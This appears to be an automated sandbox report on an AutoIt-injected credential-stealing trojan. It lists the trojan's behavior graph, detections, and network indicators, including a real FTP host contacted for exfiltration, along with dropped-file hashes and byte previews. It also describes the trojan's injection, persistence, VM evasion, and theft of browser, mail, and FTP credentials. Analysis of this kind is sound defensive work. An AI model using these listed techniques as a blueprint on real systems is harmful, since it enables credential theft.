                1
                DLL Side-Loading
                NTDS138
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                1
                Masquerading
                LSA Secrets761
                Security Software Discovery
                SSH3
                Clipboard Data
                12
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder
                2
                Valid Accounts
                Cached Domain Credentials231
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items231
                Virtualization/Sandbox Evasion
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1588621; Sample: RHOqJ5BrHW.exe; Startdate: 11/01/2025; Architecture: WINDOWS; Score: 100

• 2 (start) -> 30: ip-api.com
• 2 (start) -> 32: ftp.antoniomayol.com
• 2 (start) -> 34: antoniomayol.com
• 2 (start) -> 40: Suricata IDS alerts for network traffic
• 2 (start) -> 42: Found malware configuration
• 2 (start) -> 44: Malicious sample detected (through community Yara rule)
• 2 (start) -> 46: 11 other signatures
• 2 (start) -> 8: RHOqJ5BrHW.exe 6, started
• 2 (start) -> 12: wscript.exe 1, started
• 8 -> 26: C:\Users\user\AppData\...\unjuridically.exe, PE32, dropped
• 8 -> 62: Binary is likely a compiled AutoIt script file
• 8 -> 14: unjuridically.exe 3, started
• 12 -> 64: Windows Scripting host queries suspicious COM object (likely to drop second stage)
• 12 -> 18: unjuridically.exe 2, started
• 14 -> 28: C:\Users\user\AppData\...\unjuridically.vbs, data, dropped
• 14 -> 66: Antivirus detection for dropped file
• 14 -> 68: Multi AV Scanner detection for dropped file
• 14 -> 70: Binary is likely a compiled AutoIt script file
• 14 -> 76: 4 other signatures
• 14 -> 20: RegSvcs.exe 15 2, started
• 18 -> 72: Writes to foreign memory regions
• 18 -> 74: Maps a DLL or memory area into another process
• 18 -> 24: RegSvcs.exe 2, started
• 20 -> 36: antoniomayol.com 162.241.62.63, 21, 35211, 49705 UNIFIEDLAYER-AS-1US United States
• 20 -> 38: ip-api.com 208.95.112.1, 49704, 49706, 80 TUT-ASUS United States
• 20 -> 48: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
• 20 -> 50: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
• 20 -> 52: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
• 20 -> 54: Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
• 24 -> 56: Tries to steal Mail credentials (via file / registry access)
• 24 -> 58: Tries to harvest and steal ftp login credentials
• 24 -> 60: Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label | Link
RHOqJ5BrHW.exe | 58% | ReversingLabs | Win32.Trojan.AutoitInject |
RHOqJ5BrHW.exe | 62% | Virustotal | | Browse
RHOqJ5BrHW.exe | 100% | Avira | HEUR/AGEN.1319212 |
RHOqJ5BrHW.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | 100% | Avira | HEUR/AGEN.1319212 |
C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | 58% | ReversingLabs | Win32.Trojan.AutoitInject |
C:\Users\user\AppData\Local\Lityerses\unjuridically.exe | 62% | Virustotal | | Browse
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
antoniomayol.com | 162.241.62.63 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
ftp.antoniomayol.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://antoniomayol.com | RegSvcs.exe, 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ftp.antoniomayol.com | RegSvcs.exe, 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.dyn.com/ | unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | RegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | false
162.241.62.63 | antoniomayol.com | United States | | 46606 | UNIFIEDLAYER-AS-1US | false
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1588621
                                  Start date and time:2025-01-11 03:18:27 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 41s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:RHOqJ5BrHW.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:382b40ce3e7d7fc44a80d1b9190914a401c968be78c7115a8e4e3ccd40b8888d.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 64
                                  • Number of non-executed functions: 304
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
03:19:22 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs
21:19:21 | API Interceptor | 9860381x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.95.112.1 | J8V6dFanEo.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 3FjrbCZgDN.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | ewYjhndHg2.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | uEuTtkxAqq.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 0I9GLRSiy0.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | NUGMrDcg4v.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | LMxd0gpIxe.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | rComprobante_swift_8676534657698632.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 28uMwHvbTD.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | e4Iw3lwFJ5.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
162.241.62.63 | Order 122001-220 guanzo.exe | Get hash | malicious | FormBook | Browse | www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ip-api.com | J8V6dFanEo.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | 3FjrbCZgDN.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | ewYjhndHg2.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | uEuTtkxAqq.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | 0I9GLRSiy0.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | NUGMrDcg4v.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | LMxd0gpIxe.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | rComprobante_swift_8676534657698632.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | 28uMwHvbTD.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | e4Iw3lwFJ5.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
UNIFIEDLAYER-AS-1US | ru52XOQ1p7.exe | Get hash | malicious | AgentTesla | Browse | 192.254.186.165
UNIFIEDLAYER-AS-1US | 28uMwHvbTD.exe | Get hash | malicious | AgentTesla | Browse | 162.241.62.63
UNIFIEDLAYER-AS-1US | https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f | Get hash | malicious | HTMLPhisher | Browse | 162.241.149.91
UNIFIEDLAYER-AS-1US | https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f | Get hash | malicious | HTMLPhisher | Browse | 162.241.149.91
UNIFIEDLAYER-AS-1US | Bontrageroutdoors_Project_Update_202557516.pdf | Get hash | malicious | Unknown | Browse | 108.179.241.236
UNIFIEDLAYER-AS-1US | e4Iw3lwFJ5.exe | Get hash | malicious | AgentTesla | Browse | 162.241.62.63
UNIFIEDLAYER-AS-1US | https://probashkontho.com/work/Organization/privacy/index_.html | Get hash | malicious | Unknown | Browse | 192.185.57.31
UNIFIEDLAYER-AS-1US | Y8Q1voljvb.exe | Get hash | malicious | AgentTesla | Browse | 192.254.186.165
UNIFIEDLAYER-AS-1US | secured File__esperion.com.html | Get hash | malicious | Phisher | Browse | 162.241.149.91
UNIFIEDLAYER-AS-1US | secured File__esperion.com.html | Get hash | malicious | Phisher | Browse | 162.241.149.91
TUT-ASUS | J8V6dFanEo.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | 3FjrbCZgDN.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | ewYjhndHg2.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | uEuTtkxAqq.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | 0I9GLRSiy0.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | NUGMrDcg4v.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | LMxd0gpIxe.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | rComprobante_swift_8676534657698632.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | 28uMwHvbTD.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | e4Iw3lwFJ5.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
                                  No context
                                  No context
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1036800
                                  Entropy (8bit):6.894564802528682
                                  Encrypted:false
                                  SSDEEP:12288:Jtb20Qc3lT7af41ePBRYuQLKpqeUhbTv5OFgNDPPpHrYPTYC2ajbP50s3o32VV6A:Jtb20pkaCqT5TBWgNjVYrpv13G+V6A
                                  MD5:BC7FEE37D8D779B635750BCE96B9ECD9
                                  SHA1:7EA7EB2001C6A29D93F2D780DBF2EF37070689BE
                                  SHA-256:382B40CE3E7D7FC44A80D1B9190914A401C968BE78C7115A8E4E3CCD40B8888D
                                  SHA-512:1FCAFCD2FC26508F1C18D5261CFAD45A43B98DC6BB67665C8C3D89AF120CB1EAAD7204B46901424927F034FF3F9E8F72724BD3A5250E79C7EC5457ECFD6EB70E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 58%
                                  • Antivirus: Virustotal, Detection: 62%, Browse
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L.....hg..........".................t_............@..........................@............@...@.......@......................p..|....@...@......................Ll..................................0'..@............................................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc....@...@...B..................@..@.reloc..t............,..............@..B................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):245248
                                  Entropy (8bit):6.5490173775607365
                                  Encrypted:false
                                  SSDEEP:6144:PceANBRND9iy7zfovLfMJny1bZZYUlqzEO3IL0u9SYXAgrLjc98:ZANv3fY5TAe4u9SYXAejm8
                                  MD5:FD16AC67E115A223CC50F5019A3F052B
                                  SHA1:1D703AC8FF6EB9450697CD1876405AE608E9CF37
                                  SHA-256:11374F7B169A7DD18927070D7961F1050FC8B6A98B9803EB15A2687F4A62D89D
                                  SHA-512:593582A3D9EB4D2A9E0A35099819A14FD3B6633456A2F33C48652BF97F615E34ABC435BDF7C9144E54F9E7D6B88480110892B51E9D5D29E73698B80D493EF2FD
                                  Malicious:false
                                  Reputation:low
                                  Preview:z..W6AB1V9N9..RX.5AB1R9NyM7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1.9N9C(.VW.H...8..lc:1$.10^5K/TmT369Z5bS7.<L#.;6wq...?V*\c:_Rs5AB1R9Ni.7R.V6A1.._N9M7RXW5.B3S2O2M7.[W5IB1R9N9..QXW.AB1.:N9MwRXw5AB3R9J9M7RXW5EB1R9N9M7r\W5CB1R9N9O7..W5QB1B9N9M'RXG5AB1R9^9M7RXW5AB1R5.:MxRXW5.A1.<N9M7RXW5AB1R9N9M7RXW1AN1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB.R9F9M7RXW5AB1R1n9M.RXW5AB1R9N9cC7 #5ABU.:N9m7RX.6AB3R9N9M7RXW5AB1R.N9-. +%VAB1.<N9M.QXW3AB1.:N9M7RXW5AB1R9.9Mw|*2Y.!1R5N9M7R\W5CB1R.M9M7RXW5AB1R9NyM7.XW5AB1R9N9M7RXW5..2R9N9M.RXW7AG1..L9%.SXT5AB0R9H9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB,......l.*.K 6...^.4..D..;..6.,.LF.~.O....jBT..5.M..0...".IGHS....j8\DO*b%.AX.*....|cE.r.?#.(..?p.<?j.d...q.....6:g...,.."-\|X>I!R|.6S 0X.;.8M7RX......P5|.uT:_v#*o..fJ/c...GN9MSRXWGAB139N9.7RX85AB_R9NGM7R&W5A.1R9.9M7eXW5dB1RTN9M.RXWKAB1.DA6..1$..B1R9N...b.:...n.....#.)n#z..*....]..N*.%z.~..\.^..&.RH..oUYQ1D@6V:B.C|....CF5W;I=N;oV........t...&...b(.29M7RXW.AB.R9N..7.XW5.B.R..9M7.W.A.1..9
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
